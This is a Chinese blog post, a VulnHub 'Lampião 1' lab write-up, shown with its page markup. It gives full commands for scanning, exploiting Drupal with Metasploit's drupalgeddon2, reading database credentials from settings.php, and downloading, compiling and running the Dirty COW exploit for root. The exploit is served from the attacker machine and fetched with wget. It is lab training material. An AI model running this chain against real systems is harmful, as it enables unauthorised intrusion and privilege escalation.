<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.cat.net/css?family=Lato:300,300italic,400,400italic,700,700italic|Fira Code:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"swanq.top","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!  前言本靶场目标：获取root权限 0x01 靶机环境靶机：GoldenEye 192.168.221.136 攻击机：kali 192.168.221.130 0x02 信息收">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnHub靶机系列：shentouLampiao渗透Writeup">
<meta property="og:url" content="http://swanq.top/2021/07/02/vulnHub-Lampiao/index.html">
<meta property="og:site_name" content="SwanQ&#39;s Blue SKY">
<meta property="og:description" content="Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!  前言本靶场目标：获取root权限 0x01 靶机环境靶机：GoldenEye 192.168.221.136 攻击机：kali 192.168.221.130 0x02 信息收">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://swanq.top/2021/07/02/vulnHub-Lampiao/1.png">
<meta property="og:image" content="http://swanq.top/2021/07/02/vulnHub-Lampiao/2.png">
<meta property="og:image" content="http://swanq.top/2021/07/02/vulnHub-Lampiao/database.png">
<meta property="og:image" content="http://swanq.top/2021/07/02/vulnHub-Lampiao/users2.png">
<meta property="og:image" content="http://swanq.top/2021/07/02/vulnHub-Lampiao/8.png">
<meta property="og:image" content="http://swanq.top/2021/07/02/vulnHub-Lampiao/12.png">
<meta property="og:image" content="http://swanq.top/2021/07/02/vulnHub-Lampiao/13.png">
<meta property="article:published_time" content="2021-07-02T10:13:58.000Z">
<meta property="article:modified_time" content="2021-07-09T02:19:33.750Z">
<meta property="article:author" content="swanQ">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="网络空间安全">
<meta property="article:tag" content="靶机渗透">
<meta property="article:tag" content="vulnhub">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://swanq.top/2021/07/02/vulnHub-Lampiao/1.png">

<link rel="canonical" href="http://swanq.top/2021/07/02/vulnHub-Lampiao/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>vulnHub靶机系列：shentouLampiao渗透Writeup | SwanQ's Blue SKY</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">SwanQ's Blue SKY</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">TO LIVE IS TO RISK IT ALL</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">54</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">3</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">26</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://swanq.top/2021/07/02/vulnHub-Lampiao/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/author.jpg">
      <meta itemprop="name" content="swanQ">
      <meta itemprop="description" content="让自己去触碰安全的blue sky">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SwanQ's Blue SKY">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          vulnHub靶机系列：shentouLampiao渗透Writeup
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-07-02 18:13:58" itemprop="dateCreated datePublished" datetime="2021-07-02T18:13:58+08:00">2021-07-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-07-09 10:19:33" itemprop="dateModified" datetime="2021-07-09T10:19:33+08:00">2021-07-09</time>
              </span>

          
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
              <span>1.8k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
              <span>2 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <blockquote>
<p>Would you like to keep hacking in your own lab?</p>
<p>Try this brand new vulnerable machine! “Lampião 1”.</p>
<p>Get root!</p>
</blockquote>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>本靶场目标：获取root权限</p>
<h1 id="0x01-靶机环境"><a href="#0x01-靶机环境" class="headerlink" title="0x01 靶机环境"></a>0x01 靶机环境</h1><p>靶机：GoldenEye 192.168.221.136</p>
<p>攻击机：kali 192.168.221.130</p>
<h1 id="0x02-信息收集"><a href="#0x02-信息收集" class="headerlink" title="0x02 信息收集"></a>0x02 信息收集</h1><h2 id="获取目标IP"><a href="#获取目标IP" class="headerlink" title="获取目标IP"></a>获取目标IP</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sP 192.168.221.0/24</span><br></pre></td></tr></table></figure>



<h2 id="服务扫描及信息收集"><a href="#服务扫描及信息收集" class="headerlink" title="服务扫描及信息收集"></a>服务扫描及信息收集</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV -vv -p 1-65535 192.168.221.136</span><br></pre></td></tr></table></figure>

<p><img src="/2021/07/02/vulnHub-Lampiao/1.png"></p>
<p>22：ssh</p>
<p>80</p>
<p>1898：apache 2.4.7，此服务识别不了，直接返回数据</p>
<h1 id="0x03-漏洞探测及利用"><a href="#0x03-漏洞探测及利用" class="headerlink" title="0x03 漏洞探测及利用"></a>0x03 漏洞探测及利用</h1><p>访问1898端口为用户登录页面。dirb扫1898服务所有目录，发现敏感目录robots.txt</p>
<p><img src="/2021/07/02/vulnHub-Lampiao/2.png"></p>
<p>robots.txt中记录了网站日志更改记录文件</p>
<h2 id="durpal"><a href="#durpal" class="headerlink" title="durpal"></a>durpal</h2><p>用durpal7的cms建站</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">search dupral</span><br><span class="line">use exploit/unix/webapp/drupal_drupalgeddon2</span><br><span class="line"><span class="built_in">set</span> rhosts 192.168.221.136</span><br><span class="line"><span class="built_in">set</span> rport 1898</span><br><span class="line">exploit</span><br><span class="line"><span class="comment"># 直接拿下shell </span></span><br><span class="line">shell</span><br></pre></td></tr></table></figure>

<p>但www-data权限较低</p>
<p>切换到/bin/bash目录：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span></span><br></pre></td></tr></table></figure>

<p>可以看到home路径下，<strong>用户名为tiago</strong></p>
<h2 id="数据库"><a href="#数据库" class="headerlink" title="数据库"></a>数据库</h2><p>网站一般有数据库的配置文件，在/var/www/html/sites/下有setting.php中写了数据库的用户名和密码</p>
<p>用户名：drupaluser</p>
<p>密码：Virgulino</p>
<p><img src="/2021/07/02/vulnHub-Lampiao/database.png"></p>
<p>在users表中发现name和password。密码一般为md5加密，但并未查出来</p>
<p><img src="/2021/07/02/vulnHub-Lampiao/users2.png"></p>
<h2 id="SSH访问服务器"><a href="#SSH访问服务器" class="headerlink" title="SSH访问服务器"></a>SSH访问服务器</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh tiago@192.168.221.136</span><br></pre></td></tr></table></figure>

<p>以tiago身份登录服务器成功</p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>查看靶机内核</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">lsb_release -a</span><br><span class="line">uname -a</span><br></pre></td></tr></table></figure>

<p>考虑用16年的dirtycow提取</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">search </span><br><span class="line">cp &#x2F;usr&#x2F;share&#x2F;exploitdb&#x2F;exploits&#x2F;linux&#x2F;local&#x2F;40847.cpp &#x2F;var&#x2F;www&#x2F;html</span><br><span class="line">cd &#x2F;var&#x2F;www&#x2F;html</span><br><span class="line">python -m SimpleHTTPServer 80</span><br></pre></td></tr></table></figure>

<p><img src="/2021/07/02/vulnHub-Lampiao/8.png"></p>
<p>靶机：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">wget  http:&#x2F;&#x2F;192.168.221.130&#x2F;40847.cpp</span><br><span class="line">chmod 777 40847.cpp</span><br><span class="line"></span><br><span class="line">g++ -Wall -pedantic -O2 -std&#x3D;c++11 -pthread -o dcow 40847.cpp -lutil</span><br><span class="line">.&#x2F;dcow -s</span><br></pre></td></tr></table></figure>

<blockquote>
<p>参数解释：</p>
<ol>
<li>-Wall 一般使用该选项，允许发出GCC能够提供的所有有用的警告</li>
<li>-pedantic 允许发出ANSI/ISO C标准所列出的所有警告</li>
<li>-O2编译器的优化选项的4个级别，-O0表示没有优化,-O1为缺省值，-O3优化级别最高</li>
<li>-std=c++11就是用按C++2011标准来编译的</li>
<li>-pthread 在Linux中要用到多线程时，需要链接pthread库</li>
<li>-o dcow gcc生成的目标文件,名字为dcow</li>
</ol>
</blockquote>
<p><img src="/2021/07/02/vulnHub-Lampiao/12.png"></p>
<p>拿到flag</p>
<p><img src="/2021/07/02/vulnHub-Lampiao/13.png"></p>
<h1 id="0x04-复盘"><a href="#0x04-复盘" class="headerlink" title="0x04 复盘"></a>0x04 复盘</h1><ul>
<li>其实一般流程就是信息收集：</li>
<li><ol>
<li>端口 服务，再者是网站的目录，获取普通权限。</li>
<li>获取使用的CMS或者中间件，去查找其对应的漏洞，然后上传exp，编译执行拿到一定权限。</li>
<li>进入bin/bash。查找网站配置文件，寻找数据库用户名密码登录拖库。</li>
<li>亦或者是ssh连接，然后用提权EXP进行提权，最终拿到root权限</li>
</ol>
</li>
<li>远程bash的上下左右键或者delete键键入会产生很奇怪的符号，敲代码的时候就很难受</li>
<li>脏牛提权脚本中有其如何执行的注释，之后的EXP记得看</li>
</ul>
<h1 id="0x05-todolist"><a href="#0x05-todolist" class="headerlink" title="0x05 todolist"></a>0x05 todolist</h1><ol>
<li>dirtycow漏洞具体原理</li>
<li>dupal漏洞的具体原理</li>
</ol>
<h1 id="参考："><a href="#参考：" class="headerlink" title="参考："></a>参考：</h1><ol>
<li>靶机地址：<a target="_blank" rel="noopener" href="https://www.vulnhub.com/">https://www.vulnhub.com/</a></li>
<li>文章参考：<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/ce319b350885?utm_campaign=maleskine&amp;utm_content=note&amp;utm_medium=seo_notes&amp;utm_source=recommendation">https://www.jianshu.com/p/ce319b350885?utm_campaign=maleskine&amp;utm_content=note&amp;utm_medium=seo_notes&amp;utm_source=recommendation</a></li>
</ol>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>swanQ
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://swanq.top/2021/07/02/vulnHub-Lampiao/" title="vulnHub靶机系列：shentouLampiao渗透Writeup">http://swanq.top/2021/07/02/vulnHub-Lampiao/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

	  <div>
      
       <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">你想在文章末尾对读者说的话</div>
    
</div>
      
      </div>
      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"><i class="fa fa-tag"></i> 渗透测试</a>
              <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
              <a href="/tags/%E7%BD%91%E7%BB%9C%E7%A9%BA%E9%97%B4%E5%AE%89%E5%85%A8/" rel="tag"><i class="fa fa-tag"></i> 网络空间安全</a>
              <a href="/tags/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/" rel="tag"><i class="fa fa-tag"></i> 靶机渗透</a>
              <a href="/tags/vulnhub/" rel="tag"><i class="fa fa-tag"></i> vulnhub</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/07/01/base-64/" rel="prev" title="base64解决terminal之间编码不同的问题">
      <i class="fa fa-chevron-left"></i> base64解决terminal之间编码不同的问题
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/07/05/%E9%87%91%E7%A5%A8/" rel="next" title="域渗透提权维权之金票">
      域渗透提权维权之金票 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-%E9%9D%B6%E6%9C%BA%E7%8E%AF%E5%A2%83"><span class="nav-number">2.</span> <span class="nav-text">0x01 靶机环境</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">3.</span> <span class="nav-text">0x02 信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E7%9B%AE%E6%A0%87IP"><span class="nav-number">3.1.</span> <span class="nav-text">获取目标IP</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9C%8D%E5%8A%A1%E6%89%AB%E6%8F%8F%E5%8F%8A%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">3.2.</span> <span class="nav-text">服务扫描及信息收集</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B%E5%8F%8A%E5%88%A9%E7%94%A8"><span class="nav-number">4.</span> <span class="nav-text">0x03 漏洞探测及利用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#durpal"><span class="nav-number">4.1.</span> <span class="nav-text">durpal</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="nav-number">4.2.</span> <span class="nav-text">数据库</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SSH%E8%AE%BF%E9%97%AE%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-number">4.3.</span> <span class="nav-text">SSH访问服务器</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8F%90%E6%9D%83"><span class="nav-number">4.4.</span> <span class="nav-text">提权</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-%E5%A4%8D%E7%9B%98"><span class="nav-number">5.</span> <span class="nav-text">0x04 复盘</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x05-todolist"><span class="nav-number">6.</span> <span class="nav-text">0x05 todolist</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%82%E8%80%83%EF%BC%9A"><span class="nav-number">7.</span> <span class="nav-text">参考：</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="swanQ"
      src="/images/author.jpg">
  <p class="site-author-name" itemprop="name">swanQ</p>
  <div class="site-description" itemprop="description">让自己去触碰安全的blue sky</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">26</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">54</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="sidebar-button motion-element"><i class="fa fa-comment"></i>
    聊天
  </a>
  </div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:zhuoma.swanq@foxmail.com" title="E-Mail → mailto:zhuoma.swanq@foxmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">swanQ</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">80k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">1:13</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
<script type="text/javascript" src="/js/src/clicklove.js"></script>
</html>
